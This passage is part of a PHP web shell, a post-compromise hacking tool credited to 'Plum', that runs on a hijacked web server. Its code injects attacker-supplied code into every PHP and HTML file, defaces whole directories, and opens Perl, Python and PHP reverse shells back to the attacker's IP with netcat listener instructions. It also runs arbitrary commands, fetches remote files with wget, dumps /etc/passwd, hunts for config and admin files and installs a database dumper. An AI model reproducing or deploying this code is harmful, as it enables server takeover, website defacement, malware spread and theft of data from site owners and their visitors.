623 error("Failed to find or get sites hosted on same server from: <a href='http://www.yougetsignal.com/tools/web-sites-on-web-server/'>www.yougetsignal.com</a>!<br>Additional Message:<br>$message");
624 }
625}
626
627//Search files and directories
628if(isset($_GET['search'])) {
629 echo "<center>
630 <form action='' method='post'>
631 Search for value in file and directory names.<br>
632 Directory to search in: <input type='text' name='search_dir' value='$dir'><br>
633 Value to search for: <input type='text' name='search_val'><br>
634 <input type='submit' name='search' value='Search'>
635 </form>
636 </center>";
637}
638if(isset($_POST['search'])) {
639 $searchdir = $_POST['search_dir'];
640 $searchval = $_POST['search_val'];
641 echo "Search results that contain '$searchval' in file names.<br>";
642 foreach(mass_files($searchdir, false) as $key => $filename) {
643 $basename = pathinfo($filename, PATHINFO_BASENAME);
644 if(preg_match('/'.$searchval.'/', $basename)) {
645 echo "<a href='?edit=$filename'>$filename</a><br>";
646 }
647 }
648 echo "<br>Search results that contain '$searchval' in directory names.<br>";
649 foreach(mass_files($searchdir, true) as $key => $dirname) {
650 $basename = pathinfo($dirname, PATHINFO_BASENAME);
651 if(preg_match('/'.$searchval.'/', $basename)) {
652 echo "<a href='?dir=$dirname'>$dirname</a><br>";
653 }
654 }
655}
656
657//Config finder
658if(isset($_GET['configFinder'])) {
659 echo "Search results that contain 'config' in file names.<br>";
660 foreach(mass_files($rootdir, false) as $key => $filename) {
661 $basename = pathinfo($filename, PATHINFO_BASENAME);
662 if(preg_match('/config/', $basename)) {
663 echo "<a href='?edit=$filename'>$filename</a><br>";
664 }
665 }
666 echo "<br>Search results that contain 'config' in directory names.<br>";
667 foreach(mass_files($rootdir, true) as $key => $filename) {
668 $basename = pathinfo($filename, PATHINFO_BASENAME);
669 if(preg_match('/config/', $basename)) {
670 echo "<a href='?edit=$filename'>$filename</a><br>";
671 }
672 }
673}
674
675//Admin finder
676if(isset($_GET['adminFinder'])) {
677 echo "Search results that contain 'admin' in directory names.<br>";
678 foreach(mass_files($rootdir, true) as $key => $filename) {
679 $basename = pathinfo($filename, PATHINFO_BASENAME);
680 if(preg_match('/admin/', $basename)) {
681 echo "<a href='?edit=$filename'>$filename</a><br>";
682 }
683 }
684 echo "<br>Search results that contain 'admin' in file names.<br>";
685 foreach(mass_files($rootdir, false) as $key => $filename) {
686 $basename = pathinfo($filename, PATHINFO_BASENAME);
687 if(preg_match('/admin/', $basename)) {
688 echo "<a href='?edit=$filename'>$filename</a><br>";
689 }
690 }
691}
692
693//Hash generator
694if(isset($_GET['hashGenerator'])) {
695 echo "<center>
696 <form action='' method='post'>
697 String to hash:<br>
698 <input type='text' name='string'>
699 <input type='submit' name='generate_hashes' value='Hash'>
700 </form>
701 </center>";
702}
703if(isset($_POST['generate_hashes'])) {
704 $string = $_POST['string'];
705 $md5 = md5($string);
706 $md52 = md5(md5($string));
707 $md53 = md5(md5(md5($string)));
708 $sha1 = sha1($string);
709 $sha12 = sha1(sha1($string));
710 $sha13 = sha1(sha1(sha1($string)));
711 $joomlasalt = salt_gen("4");
712 $joomlahash = md5($string.$joomlasalt);
713 $oscommsalt = salt_gen("2");
714 $oscommhash = md5($oscommsalt.$string);
715 $vbsalt = salt_gen("3");
716 $vbhash = md5(md5($string).$vbsalt);
717 $vbsalt2 = salt_gen("30");
718 $vbhash2 = md5(md5($string).$vbsalt2);
719 $mybbsalt = salt_gen("8");
720 $mybbhash = md5(md5($mybbsalt).md5($string));
721 $mybbsalt2 = salt_gen("8");
722 $mybbhash2 = md5(md5($mybbsalt2).$string);
723 $ipbsalt = salt_gen("5");
724 $ipbhash = md5(md5($ipbsalt).md5($string));
725 echo "<center>
726 <textarea cols='120' rows='25' readonly>";
727 echo 'md5($pass): '.$md5."\n";
728 echo 'md5(md5($pass)): '.$md52."\n";
729 echo 'md5(md5(md5($pass))): '.$md53."\n";
730 echo 'sha1($pass): '.$sha1."\n";
731 echo 'sha1(sha1($pass)): '.$sha12."\n";
732 echo 'sha1(sha1(sha1($pass))): '.$sha13."\n";
733 echo 'md5($pass.$salt) (Joomla): '.$joomlahash.':'.$joomlasalt."\n";
734 echo 'md5($salt.$pass) (osCommerce): '.$oscommhash.':'.$oscommsalt."\n";
735 echo 'md5(md5($pass).$salt) (vBulletin < 3.8.5): '.$vbhash.':'.$vbsalt."\n";
736 echo 'md5(md5($pass).$salt) (vBulletin >= 3.8.5): '.$vbhash2.':'.$vbsalt2."\n";
737 echo 'md5(md5($salt).$pass) (MyBB < 1.2): '.$mybbhash2.':'.$mybbsalt2."\n";
738 echo 'md5(md5($salt).md5($pass)) (MyBB 1.2+): '.$mybbhash.':'.$mybbsalt."\n";
739 echo 'md5(md5($salt).md5($pass)) (IPB 2+): '.$ipbhash.':'.$ipbsalt."\n";
740 echo "</textarea>
741 </center>";
742}
743
744//Extract files
745if(isset($_GET['extract'])) {
746 $file = $_GET['extract'];
747 $epath = $_GET['epath'];
748 $type = $_GET['type'];
749 extract_file($file, $epath, $type);
750}
751
752//Infect files
753if(isset($_POST['do_infect'])) {
754 $infdir = rtrim($_POST['infect_dir'], '/');
755 $type = $_POST['infect_type'];
756 $infcode = $_POST['infect_code'];
757 if(is_dir($infdir)) {
758 $success = 0;
759 $failed = 0;
760 foreach(mass_files($infdir, false) as $key => $files) {
761 $exten = pathinfo($files, PATHINFO_EXTENSION);
762 if($type == 'php') {
763 if($exten == 'php') {
764 $content = $infcode;
765 $content .= file_get_contents($files);
766 if(file_put_contents($files, $content)) {
767 echo "<font color='green'><b>Successfully infected file: $files</b></font></br>";
768 $success++;
769 } else {
770 echo "<font color='red'><b>Failed to infect file: $files</b></font></br>";
771 $failed++;
772 }
773 }
774 } elseif($type == 'html') {
775 if($exten == 'html') {
776 $content = $infcode;
777 $content .= file_get_contents($files);
778 if(file_put_contents($files, $content)) {
779 echo "<font color='green'><b>Successfully infected file: $files</b></font></br>";
780 $success++;
781 } else {
782 echo "<font color='red'><b>Failed to infect file: $files</b></font></br>";
783 $failed++;
784 }
785 }
786 } elseif($type == 'both') {
787 if($exten == 'html' or $exten == 'php') {
788 $content = $infcode;
789 $content .= file_get_contents($files);
790 if(file_put_contents($files, $content)) {
791 echo "<font color='green'><b>Successfully infected file: $files</b></font></br>";
792 $success++;
793 } else {
794 echo "<font color='red'><b>Failed to infect file: $files</b></font></br>";
795 $failed++;
796 }
797 }
798 }
799 }
800 echo "A total of $success files were infected!<br>A total of $failed files failed to be infected!";
801 } else {
802 error("$infdir is not a valid directory!");
803 }
804}
805if(isset($_GET['fileInfect'])) {
806 echo "<center>
807 This will append your infect code to the top of every file in the given directory.<br>
808 <form action='' method='post'>
809 Directory to infect: <input type='text' name='infect_dir' value='$rootdir'>
810 File types to infect:
811 <select name='infect_type'>
812 <option value='php'>PHP</option>
813 <option value='html'>HTML</option>
814 <option value='both'>Both</option>
815 </select><br>
816 Code to infect files with:<br>
817 <textarea name='infect_code' cols='110' rows='20'></textarea><br>
818 <input type='submit' name='do_infect' value='Infect'>
819 </form>
820 </center>";
821}
822
823//Deface files
824if(isset($_POST['do_deface'])) {
825 $defdir = rtrim($_POST['deface_dir'], '/');
826 $type = $_POST['deface_type'];
827 $defsource = $_POST['deface_source'];
828 if(is_dir($defdir)) {
829 $success = 0;
830 $failed = 0;
831 foreach(mass_files($defdir, false) as $key => $files) {
832 $exten = pathinfo($files, PATHINFO_EXTENSION);
833 if($type == 'php') {
834 if($exten == 'php') {
835 if($files != __FILE__) {
836 if(file_put_contents($files, $defsource)) {
837 echo "<font color='green'><b>Successfully defaced file: $files</b></font></br>";
838 $success++;
839 } else {
840 echo "<font color='red'><b>Failed to deface file: $files</b></font></br>";
841 $failed++;
842 }
843 }
844 }
845 } elseif($type == 'html') {
846 if($exten == 'html') {
847 if($files != __FILE__) {
848 if(file_put_contents($files, $defsource)) {
849 echo "<font color='green'><b>Successfully defaced file: $files</b></font></br>";
850 $success++;
851 } else {
852 echo "<font color='red'><b>Failed to deface file: $files</b></font></br>";
853 $failed++;
854 }
855 }
856 }
857 } elseif($type == 'both') {
858 if($exten == 'html' or $exten == 'php') {
859 if($files != __FILE__) {
860 if(file_put_contents($files, $defsource)) {
861 echo "<font color='green'><b>Successfully defaced file: $files</b></font></br>";
862 $success++;
863 } else {
864 echo "<font color='red'><b>Failed to deface file: $files</b></font></br>";
865 $failed++;
866 }
867 }
868 }
869 }
870 }
871 echo "A total of $success files were defaced!<br>A total of $failed files failed to be defaced!";
872 } else {
873 error("$defdir is not a valid directory!");
874 }
875}
876if(isset($_GET['fileDeface'])) {
877 echo "<center>
878 This will deface every file in the given directory. This will not deface this shell.<br>
879 <form action='' method='post'>
880 Directory to deface: <input type='text' name='deface_dir' value='$rootdir'>
881 File types to deface:
882 <select name='deface_type'>
883 <option value='php'>PHP</option>
884 <option value='html'>HTML</option>
885 <option value='both'>Both</option>
886 </select><br>
887 Source to deface files with:<br>
888 <textarea name='deface_source' cols='110' rows='20'></textarea><br>
889 <input type='submit' name='do_deface' value='Deface'>
890 </form>
891 </center>";
892}
893
894//Install MSD
895if(isset($_POST['install_msd'])) {
896 if($_POST['version'] == "1") {
897 $msd1link = $links['MSD1']['LINK'];
898 $name = "msdv2.zip";
899 } else {
900 $msd1link = $links['MSD2']['LINK'];
901 $name = "msd1.24.4.zip";
902 }
903 $msd1dir = rtrim($_POST['msd_dir'], '/');
904 if(is_dir($msd1dir)) {
905 $get = file_get_contents($msd1link);
906 if(file_put_contents("$msd1dir/$name", $get)) {
907 extract_file("$msd1dir/$name", $msd1dir, "zip");
908 } else {
909 error('Failed to write zip file to $msd1dir!');
910 }
911 } else {
912 if(mkdir($msd1dir, 0777)) {
913 $get = file_get_contents($msd1link);
914 if(file_put_contents("$msd1dir/$name", $get)) {
915 extract_file("$msd1dir/$name", $msd1dir, "zip");
916 } else {
917 error('Failed to write zip file to $msd1dir!');
918 }
919 } else {
920 error('Failed to make directory $msd1dir!');
921 }
922 }
923}
924if(isset($_GET['installMSD'])) {
925 echo "<center>
926 <form action='' method='post'>
927 <font size='4'>MySQL Dumper v2.1 By Plum</font><br>
928 Directory to install to. If it doesn't exist it will try and create it.<br>
929 <input type='text' name='msd_dir' value='$dir/msd' size='50'>
930 <input type='hidden' name='version' value='1'>
931 <input type='submit' name='install_msd' value='Install'>
932 </form>
933 </center>";
934}
935if(isset($_GET['installMSD2'])) {
936 echo "<center>
937 <form action='' method='post'>
938 <font size='4'>MySQL Dumper v1.24.4 By <a href='http://www.mysqldumper.net/'>http://www.mysqldumper.net/</a></font><br>
939 Directory to install to. If it doesn't exist it will try and create it.<br>
940 <input type='text' name='msd_dir' value='$dir/msd' size='50'>
941 <input type='hidden' name='version' value='2'>
942 <input type='submit' name='install_msd' value='Install'>
943 </form>
944 </center>";
945}
946
947//Back connect
948if(isset($_POST['bcpl_connect'])) {
949 $ip = $_POST['bcpl_ip'];
950 $port = $_POST['bcpl_port'];
951 if(can_exe()) {
952 if(file_exists("/tmp/bc.pl")) {
953 echo "<center>
954 Trying to connect to $ip on port $port<br>
955 The response from 'perl /tmp/bc.pl $ip $port' was:<br>
956 <textarea cols='120' rows='25'>".exe_cmd("perl /tmp/bc.pl $ip $port")."</textarea>
957 </center>";
958 } else {
959 error("/tmp/bc.pl does not exist!");
960 }
961 } else {
962 error("Can not execute commands! A Perl script needs to be ran to spawn this reverse shell!");
963 }
964}
965if(isset($_GET['bcPerl'])) {
966 if(can_exe()) {
967 if(is_dir('/tmp')) {
968 if(file_put_contents('/tmp/bc.pl', base64_decode($bcpl))) {
969 success("Successfully wrote /tmp/bc.pl!");
970 echo "<center>
971 <form action='' method='post'>
972 IP: <input type='text' name='bcpl_ip' value='$yourip'>
973 Port: <input type='text' name='bcpl_port' value='2121' size='3'>
974 <input type='submit' name='bcpl_connect' value='Connect'><br>
975 Use: 'nc -l -v -p PORT' Remember your port must be forwarded!
976 </form>
977 </center>";
978 } else {
979 error("Failed to write Perl source to /tmp/bc.pl!");
980 }
981 } else {
982 error('/tmp is not a directory!');
983 }
984 } else {
985 error("Can not execute commands! A Perl script needs to be ran to spawn this reverse shell!");
986 }
987}
988
989if(isset($_POST['bcpy_connect'])) {
990 $ip = $_POST['bcpy_ip'];
991 $port = $_POST['bcpy_port'];
992 if(can_exe()) {
993 if(file_exists("/tmp/bc.py")) {
994 echo "<center>
995 Trying to connect to $ip on port $port<br>
996 The response from 'python /tmp/bc.py $ip $port' was:<br>
997 <textarea cols='120' rows='25'>".exe_cmd("python /tmp/bc.py $ip $port")."</textarea>
998 </center>";
999 } else {
1000 error("/tmp/bc.py does not exist!");
1001 }
1002 } else {
1003 error("Can not execute commands! A Python script needs to be ran to spawn this reverse shell!");
1004 }
1005}
1006if(isset($_GET['bcPython'])) {
1007 if(can_exe()) {
1008 if(is_dir("/tmp")) {
1009 if(file_put_contents('/tmp/bc.py', base64_decode($bcpy))) {
1010 success("Successfully wrote /tmp/by.py");
1011 echo "<center>
1012 <form action='' method='post'>
1013 IP: <input type='text' name='bcpy_ip' value='$yourip'>
1014 Port: <input type='text' name='bcpy_port' value='2121' size='3'>
1015 <input type='submit' name='bcpy_connect' value='Connect'><br>
1016 Use 'nc -l -v -p PORT' Remember your port must be forwarded!
1017 </form>
1018 </center>";
1019 } else {
1020 error("Failed to write Python source to /tmp/by.py");
1021 }
1022 } else {
1023 error("/tmp is not a directory!");
1024 }
1025 } else {
1026 error("Can not execute commands! A Python script needs to be ran to spawn this reverse shell!");
1027 }
1028}
1029
1030if(isset($_POST['bcphp_connect'])) {
1031 $ip = $_POST['bcphp_ip'];
1032 $port = $_POST['bcphp_port'];
1033 echo "<center>Trying to connect!</center>";
1034 $sockopen = fsockopen($ip , $port , $errno, $errstr);
1035 if(!$sockopen) {
1036 error("Failed to open socket!");
1037 } elseif($errno != 0) {
1038 error("$errno: $errstr");
1039 } else {
1040 fputs($sockopen, "\n[+]PHP Back Connection[+]\n\n");
1041 $uname = exe_cmd("uname -a");
1042 $id = exe_cmd("id");
1043 fputs($sockopen, "$uname$id\n");
1044 while(!feof($sockopen)) {
1045 fputs($sockopen, "> ");
1046 $command = fgets($sockopen);
1047 fputs($sockopen , exe_cmd($command));
1048 }
1049 fclose($sockopen);
1050 }
1051}
1052if(isset($_GET['bcPHP'])) {
1053 if(can_exe()) {
1054 echo "<center>
1055 <form action='' method='post'>
1056 IP: <input type='text' name='bcphp_ip' value='$yourip'>
1057 Port: <input type='text' name='bcphp_port' value='2121' size='3'>
1058 <input type='submit' name='bcphp_connect' value='Connect'><br>
1059 Use 'nc -l -v -p PORT' Remember your port must be forwarded!
1060 </form>
1061 </center>";
1062 } else {
1063 error("Can not execute commands! Commands need to be executed for this reverse shell to work!");
1064 }
1065}
1066
1067//System stuff
1068if(isset($_GET['users'])) {
1069 if(file_exists('/etc/passwd')) {
1070 $getfile = file_get_contents('/etc/passwd');
1071 $exline = explode("\n", $getfile);
1072 echo "<table>
1073 <tr>
1074 <th>Username</th>
1075 <th>Password?</th>
1076 <th>UID</th>
1077 <th>GID</th>
1078 <th>UID Info</th>
1079 <th>Home Directory</th>
1080 <th>Command/Shell</th>
1081 </tr>";
1082 foreach($exline as $exl) {
1083 echo "<tr>";
1084 $excol = explode(":", $exl);
1085 foreach($excol as $exc) {
1086 echo "<td>$exc</td>";
1087 }
1088 echo "</tr>";
1089 }
1090 echo "</table>";
1091 } else {
1092 error("/etc/passwd does not exist!");
1093 }
1094}
1095
1096if(isset($_GET['processes'])) {
1097 if(can_exe()) {
1098 $processes = exe_cmd("ps aux");
1099 $stripfirstline = substr($processes, strpos($processes, "\n")+1);
1100 $exline = explode("\n", $stripfirstline);
1101 echo "<div id='hover'>
1102 <table width='100%' border='1'>
1103 <tr>
1104 <th>Kill</th>
1105 <th>USER</th>
1106 <th>PID</th>
1107 <th>%CPU</th>
1108 <th>%MEM</th>
1109 <th>VSZ</th>
1110 <th>RSS</th>
1111 <th>TTY</th>
1112 <th>STAT</th>
1113 <th>START</th>
1114 <th>TIME</th>
1115 <th>COMMAND</th>
1116 </tr>";
1117 foreach($exline as $exl) {
1118 echo "<tr>";
1119 $exsp = array_values(array_filter(explode(" ", $exl), 'strlen'));
1120 if(count($exsp) > 11) {
1121 $slice = array_slice($exsp, 0, 10);
1122 echo "<td><a href='?killProccess=".$exsp[1]."'>Kill</a></td>";
1123 foreach($slice as $s) {
1124 echo "<td>$s</td>";
1125 }
1126 $slice2 = array_slice($exsp, 10);
1127 echo "<td>".implode(" ", $slice2)."</td>";
1128 } else {
1129 echo "<td><a href='?killProccess=".$exsp[1]."'>Kill</a></td>";
1130 foreach($exsp as $e) {
1131 echo "<td>$e</td>";
1132 }
1133 }
1134 echo "</tr>";
1135 }
1136 echo "</table></div>";
1137 } else {
1138 error("Can not execute commands! Must execute 'ps aux' to get processes.");
1139 }
1140}
1141
1142if(isset($_GET['memory'])) {
1143 if(file_exists('/proc/meminfo')) {
1144 $raminfo = file_get_contents('/proc/meminfo');
1145 echo "Ram:<br><pre>$raminfo</pre><br><br>";
1146 } else {
1147 error("/proc/meminfo does not exist!");
1148 }
1149 $hddfree = disk_free_space("/");
1150 $hddtotal = disk_total_space("/");
1151 $hddused = $hddtotal - $hddfree;
1152 $hddpercent = round(($hddused / $hddtotal) * 100);
1153 echo "HDD:<br>Total Space: ".ByteConversion($hddtotal)."<br>Free Space: ".ByteConversion($hddfree)."<br>Used Space: ".ByteConversion($hddused)."<br>Percent Used: ~$hddpercent%";
1154}
1155
1156if(isset($_GET['cpu'])) {
1157 if(file_exists('/proc/cpuinfo')) {
1158 $cpuinfo = file_get_contents('/proc/cpuinfo');
1159 echo "<center>
1160 CPU Information:<br>
1161 <textarea cols='120' rows='20'>$cpuinfo</textarea>
1162 </center>";
1163 } else {
1164 error('/proc/cpuinfo does not exist!');
1165 }
1166}
1167
1168//Execute command
1169if(isset($_POST['exe_cmd'])) {
1170 $command = $_POST['command'];
1171 if(can_exe()) {
1172 echo "<center>
1173 <form action='' method='post'>
1174 <input type='text' name='command' size='75'>
1175 <input type='submit' name='exe_cmd'>
1176 </form>
1177 The response from '$command' was:<br>
1178 <textarea cols='100' rows='20'>".exe_cmd($command)."</textarea>
1179 </center>";
1180 } else {
1181 error("Can not execute commands!");
1182 }
1183}
1184
1185//Create file
1186if(isset($_POST['create_file'])) {
1187 $createpath = $_POST['create_file_path'];
1188 if(!file_exists($createpath)) {
1189 if(fopen($createpath, "w+")) {
1190 redirect("?edit=$createpath");
1191 } else {
1192 error("Failed to create file!");
1193 }
1194 } else {
1195 error("File already exists! You can view it <a href='?edit=$createpath'>here</a>.");
1196 }
1197}
1198//Create directory
1199if(isset($_POST['create_dir'])) {
1200 $dirpath = $_POST['create_dir_path'];
1201 if(!is_dir($dirpath)) {
1202 if(mkdir($dirpath, 0777)) {
1203 redirect("?dir=$dirpath");
1204 } else {
1205 error("Failed to make directory!");
1206 }
1207 } else {
1208 error("This directory already exists! You can view it <a href='?dir=$dirpath'>here</a>.");
1209 }
1210}
1211
1212//wget file
1213if(isset($_POST['do_wget'])) {
1214 $fileurl = $_POST['wget_file'];
1215 if(can_exe()) {
1216 echo "<center>
1217 The response from 'wget $fileurl' was:<br>
1218 <textarea cols='120' rows='20'>".exe_cmd("wget $fileurl")."</textarea>
1219 </center>";
1220 } else {
1221 error("Commands can not be executed!");
1222 }
1223}
1224
1225//Upload file
1226if(isset($_POST['do_upload'])) {
1227 $uploaddir = $_POST['upload_dir'];
1228 $uploadname = $_FILES['upload_file']['name'];
1229 if(!file_exists("$uploaddir/$uploadname")) {
1230 if(move_uploaded_file($_FILES['upload_file']['tmp_name'], "$uploaddir/$uploadname")) {
1231 redirect("?dir=$uploaddir");
1232 } else {
1233 error("Failed to upload file!");
1234 }
1235 } else {
1236 error("File already exists! You can view it <a href='?edit=$uploaddir$uploadname'>here</a>.");
1237 }
1238}
1239
1240//Mass files
1241if(isset($_POST['mass_action'])) {
1242 $action = $_POST['action'];
1243 $checked = $_POST['massbox'];
1244 if($action == 'delete') {
1245 foreach($checked as $c) {
1246 if(is_dir($c)) {
1247 if(rmdir($c)) {
1248 echo "<font color='green'><b>Successfully deleted directory: $c</font><br>";
1249 } else {
1250 echo "<font color='red'><b>Failed to delete directory: $c</font><br>";
1251 }
1252 } else {
1253 if(unlink($c)) {
1254 echo "<font color='green'><b>Successfully deleted file: $c</font><br>";
1255 } else {
1256 echo "<font color='red'><b>Failed to delete file: $c</font><br>";
1257 }
1258 }
1259 }
1260 } elseif($action == 'chmod') {
1261 $chvalue = $_POST['chmod_value'];
1262 foreach($checked as $c) {
1263 if(chmod($c, $chvalue)) {
1264 echo "<font color='red'><b>Successfully chmod'd file: $c to: $chvalue</font><br>";
1265 } else {
1266 echo "<font color='red'><b>Failed to chmod file: $c to: $chvalue</font><br>";
1267 }
1268 }
1269 } else {
1270 error('Invalid action specified!');
1271 }
1272}
1273
1274//Display disabled functions
1275if(isset($_GET['disabledFunctions'])) {
1276 echo "Disabled functions:<br>";
1277 $ex = explode(",", $disabledfunc);
1278 foreach($ex as $e) {
1279 echo "$e<br>";
1280 }
1281}
1282
1283//Kill proccess
1284if(isset($_GET['killProcess'])) {
1285 $id = $_GET['killProcess'];
1286 if(posix_kill($id)) {
1287 success("Successfully killed process: $id");
1288 } else {
1289 error("Failed to kill process: $id");
1290 }
1291}
1292
1293//Check links
1294if(isset($_GET['checkLinks'])) {
1295 echo "<table border='1'>
1296 <tr>
1297 <th>Link</th>
1298 <th>Status</th>
1299 <th>MD5</th>
1300 <th>Description</td>
1301 </tr>";
1302 foreach($links as $key => $ar) {
1303 $link = $ar['LINK'];
1304 $md5 = $ar['MD5'];
1305 $desc = $ar['DESC'];
1306 $headers = @get_headers($link);
1307 echo "<tr>";
1308 echo "<td><a href='$link'>$link</a></td>";
1309 if($headers[0] != "HTTP/1.1 403 FORBIDDEN" or $headers[0] != "HTTP/1.1 404 Not Found") {
1310 echo "<td><font color='green'><b>OK</b></font></td>";
1311 } else {
1312 echo "<td><font color='red'><b>Not Found</b></font></td>";
1313 }
1314 if(md5_file($link) == $md5) {
1315 echo "<td><font color='green'><b>Match</b></font></td>";
1316 } else {
1317 echo "<td><font color='red'><b>No Match</b></font></td>";
1318 }
1319 echo "<td>$desc</td>";
1320 echo "</tr>";
1321 }
1322 echo "</table>";
1323}
1324
1325//Credits
1326if(isset($_GET['credits'])) {
1327 echo "<center>
1328 <font size='6'><b>PHP Shell v$version</font></b><br>
1329 Written By: Plum (@PlumLulz or plumm@jabber.org)<br>
1330 Nav Bar: Bootstrap (<a href='http://getbootstrap.com/'>http://getbootstrap.com/</a>)<br>
1331 MySQL Dumper v2.1: Plum (@PlumLulz or plumm@jabber.org)<br>
1332 MySQL Dumper 1.24.4: <a href='http://mysqldumper.net'>http://mysqldumper.net</a><br>
1333 Perl Reverse Shell: pentestmonkey@pentestmonkey.net<br>
1334 Python Reverse Shell: Xavier Garcia (<a href='http://www.shellguardians.com'>http://www.shellguardians.com</a>)<br>
1335 I think that is about it. Enjoy!
1336 </center>";
1337}
1338
1339//Kill
1340if(isset($_GET['kill'])) {
1341 if(unlink(__FILE__)) {
1342 success("Successfully killed shell!");
1343 } else {
1344 error("Failed to kill shell!");
1345 }
1346}
1347
1348//Let's get the files and directories for the current dir
1349$open = opendir($dir);
1350$files = array();
1351$direcs = array();
1352while ($file = readdir($open)) {
1353 if ($file != "." && $file != "..") {
1354 if (is_dir("$dir/$file")) {
1355 array_push($direcs, $file);
1356 } else {
1357 array_push($files, $file);
1358 }
1359 }
1360}
1361asort($direcs);
1362asort($files);
1363
1364//Let's display those files and dirs
1365//Starting with directories first.
1366echo <<<html
1367<br><br>
1368<table width='100%' border='1'>
1369 <tr>
1370 <th>Current Directory:
1371html;
1372$ex = explode("/", $dir);
1373for ($p = 0; $p < count($ex); $p++) {
1374 @$linkpath.=$ex[$p] . '/';
1375 $linkpath2 = rtrim($linkpath, "/");
1376 echo "<a href='?dir=$linkpath2'>$ex[$p]</a>/";
1377}
1378echo <<<html
1379 </th>
1380 </tr>
1381</table>
1382
1383<form action='' method='post'>
1384 <div id="hover">
1385 <table width='100%' border='1'>
1386 <tr>
1387 <th>File/Dir Name</th>
1388 <th>Permissions</th>
1389 <th>Writeable</th>
1390 <th>Owner/Group</th>
1391 <th>Size</th>
1392 <th>Last Modified</th>
1393 <th>Delete</th>
1394 <th>Rename</th>
1395 <th>Mass</th>
1396 </tr>
1397html;
1398//Display directories
1399foreach($direcs as $dirs) {
1400 $perms = substr(base_convert(fileperms("$dir/$dirs"), 10, 8), 2);
1401 $writeable = is_writeable("$dir/$dirs") ? "<font color='green'><b>Writeable</b></font>" : "<font color='red'><b>Not Writeable</b></font>";
1402 $owner = fileowner("$dir/$dirs");
1403 $group = filegroup("$dir/$dirs");
1404 $size = "Directory";
1405 $lastmod = date("F d Y g:i:s", filemtime("$dir/$dirs"));
1406 echo <<<html
1407 <tr>
1408 <td><a href='?dir=$dir/$dirs'>$dirs</a></td>
1409 <td style="text-align: center;">$perms</td>
1410 <td style="text-align: center;">$writeable</td>
1411 <td style="text-align: center;">$owner/$group</td>
1412 <td>$size</td>
1413 <td>$lastmod</td>
1414 <td><a href='?delD=$dir/$dirs'>Delete</a></td>
1415 <td><a href='?rename=$dirs&rdir=$dir'>Rename</a></td>
1416 <td><input type='checkbox' name='massbox[]' value='$dir/$dirs'></td>
1417 </tr>
1418html;
1419}
1420
1421//Display files now
1422foreach($files as $file) {
1423 $perms = substr(base_convert(fileperms("$dir/$file"), 10, 8), 2);
1424 $writeable = is_writeable("$dir/$file") ? "<font color='green'><b>Writeable</b></font>" : "<font color='red'><b>Not Writeable</b></font>";
1425 $owner = fileowner("$dir/$file");
1426 $group = filegroup("$dir/$file");
1427 $size = ByteConversion(filesize("$dir/$file"));
1428 $lastmod = date("F d Y g:i:s", filemtime("$dir/$file"));
1429 $extension = pathinfo("$dir/$file", PATHINFO_EXTENSION);
1430 echo "<tr>";
1431 if(in_array($extension, $compression)) {
1432 echo "<td><a href='?extract=$dir/$file&epath=$dir&type=$extension'>$file</a></td>";
1433 } else {
1434 echo "<td><a href='?edit=$dir/$file'>$file</a></td>";
1435 }
1436 echo <<<html
1437 <td style="text-align: center;">$perms</td>
1438 <td style="text-align: center;">$writeable</td>
1439 <td style="text-align: center;">$owner/$group</td>
1440 <td>$size</td>
1441 <td>$lastmod</td>
1442 <td><a href='?delF=$dir/$file'>Delete</a></td>
1443 <td><a href='?rename=$file&rdir=$dir'>Rename</a></td>
1444 <td><input type='checkbox' name='massbox[]' value='$dir/$file'></td>
1445 </tr>
1446html;
1447}
1448echo <<<html
1449 </table>
1450 </div>
1451<div style='position:absolute; right:0%;'>
1452 <select name='action'>
1453 <option value='delete'>Delete</option>
1454 <option value='chmod'>chmod</option>
1455 </select>
1456 <input type='text' name='chmod_value' class='text' value='077' size='9'>
1457 <input type='submit' name='mass_action' value='Do Action'>
1458</div>
1459</form>
1460<br>
1461<br>
1462<br>
1463html;
1464
1465if(is_writeable($dir)) {
1466 $writeable = "<font color='green'><b>[ Writeable ]</b></font>";
1467} else {
1468 $writeable = "<font color='red'><b>[ Not Writeable ]</b></font>";
1469}
1470echo "<table width='100%' border='1'>
1471 <tr>
1472 <td>
1473 <center>
1474 <form action='' method='post'>
1475 Create File:<br>
1476 <input type='text' name='create_file_path' size='55' value='$dir/newfile.php'>
1477 <input type='submit' name='create_file' value='Create'><br>
1478 $writeable
1479 </form>
1480 </center>
1481 </td>
1482 <td>
1483 <center>
1484 <form action='' method='post'>
1485 Create Directory:<br>
1486 <input type='text' name='create_dir_path' size='55' value='$dir/newdir'>
1487 <input type='submit' name='create_dir' value='Create'><br>
1488 $writeable
1489 </form>
1490 </center>
1491 </td>
1492 </tr>
1493 <tr>
1494 <td>
1495 <center>
1496 <form action='' method='get'>
1497 Edit File:<br>
1498 <input type='text' name='edit' size='55' value='$dir/index.php'>
1499 <input type='submit' value='Edit'>
1500 </form>
1501 </center>
1502 </td>
1503 <td>
1504 <center>
1505 <form action='' method='get'>
1506 Go To Directory:<br>
1507 <input type='text' name='dir' size='55' value='/tmp'>
1508 <input type='submit' value='Go'>
1509 </form>
1510 </center>
1511 </td>
1512 </tr>
1513 <tr>
1514 <td>
1515 <center>
1516 <form action='' method='post' enctype='multipart/form-data'>
1517 Upload To Directory:<br>
1518 <input type='text' name='upload_dir' size='55' value='$dir'><br>
1519 <input type='file' name='upload_file'>
1520 <input type='submit' name='do_upload' value='Upload'><br>
1521 $writeable
1522 </form>
1523 </center>
1524 </td>
1525 <td>
1526 <center>
1527 <form action='' method='post'>
1528 wget file:<br>
1529 <input type='text' name='wget_file' size='55' value='http://'>
1530 <input type='submit' name='do_wget' value='wget'>
1531 </form>
1532 </center>
1533 </td>
1534 </tr>
1535 <tr>
1536 <td colspan='2'>
1537 <center>
1538 <form action='' method='post'>
1539 Execute Command:<br>
1540 <input type='text' name='command' size='65'>
1541 <input type='submit' name='exe_cmd' value='Execute'>
1542 </form>
1543 </center>
1544 </td>
1545 </tr>
1546 </table>
1547 <br>
1548 <br>";
1549
1550?>